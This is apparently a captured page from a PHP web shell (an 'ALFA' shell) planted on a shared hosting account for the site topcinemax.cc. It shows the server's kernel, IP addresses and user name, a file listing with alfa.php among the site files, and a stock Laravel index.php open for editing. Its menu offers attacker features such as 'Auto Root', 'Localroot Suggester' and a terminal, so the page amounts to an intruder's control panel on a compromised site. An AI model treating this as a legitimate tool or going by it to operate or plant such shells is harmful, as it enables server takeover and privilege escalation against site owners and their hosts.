Linux server333.web-hosting.com 4.18.0-553.47.1.lve.el8.x86_64 #1 SMP Tue Apr 8 13:54:31 UTC 2025 x86_64
LiteSpeed
Server IP : 162.254.39.6 & Your IP : 216.73.216.252
Domains :
Cant Read [ /etc/named.conf ]
User : dailmgzn
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
dailmgzn /
public_html /
topcinemax.cc /
Delete
Unzip
Name
Size
Permission
Date
Action
41000f
[ DIR ]
drwxr-xr-x
2025-06-15 02:45
ALFA_DATA
[ DIR ]
drwxr-xr-x
2025-06-15 02:43
assets
[ DIR ]
drwxr-xr-x
2025-06-15 02:45
c6c7c
[ DIR ]
dr-xr-xr-x
2025-06-15 05:53
engine
[ DIR ]
drwxr-xr-x
2025-06-15 02:44
wp-admin
[ DIR ]
drwxr-xr-x
2025-06-12 06:47
wp-content
[ DIR ]
drwxr-xr-x
2025-06-17 17:52
.htaccess
717
B
-r-xr-xr-x
2023-03-19 06:47
.litespeed_flag
297
B
-rw-r--r--
2025-06-17 01:35
alfa.php
66.63
KB
-rw-r--r--
2025-06-10 03:29
error_log
773.12
KB
-rw-r--r--
2025-06-17 12:42
favicon.ico
99.3
KB
-rw-r--r--
2020-07-31 16:46
google5b6eba6dc62586f6.html
53
B
-rw-r--r--
2025-06-14 00:38
googlea6244499e898b62c.html
53
B
-rw-r--r--
2025-06-14 00:36
index.php
14.25
KB
-r-xr-xr-x
2025-06-15 04:16
index.php0
1.89
KB
-rw-r--r--
2023-04-01 06:47
robots.txt
364
B
-r--r--r--
2023-07-21 06:47
style.php
13.04
KB
-rw-r--r--
2025-06-12 00:25
Save
Rename
<?php /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | our application. We just need to utilize it! We'll simply require it | into the script here so that we don't have to worry about manual | loading any of our classes later on. It feels great to relax. | */ require __DIR__.'/engine/vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Turn On The Lights |-------------------------------------------------------------------------- | | We need to illuminate PHP development, so let us turn on the lights. | This bootstraps the framework and gets it ready for use, then it | will load up this application so that we can run it and send | the responses back to the browser and delight our users. | */ $app = require_once __DIR__.'/engine/bootstrap/app.php'; // set the public path to this directory $app->bind('path.public', function() { return __DIR__; }); /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request | through the kernel, and send the associated response back to | the client's browser allowing them to enjoy the creative | and wonderful application we have prepared for them. | */ $kernel = $app->make(Illuminate\Contracts\Http\Kernel::class); $response = $kernel->handle( $request = Illuminate\Http\Request::capture() ); $response->send(); $kernel->terminate($request, $response);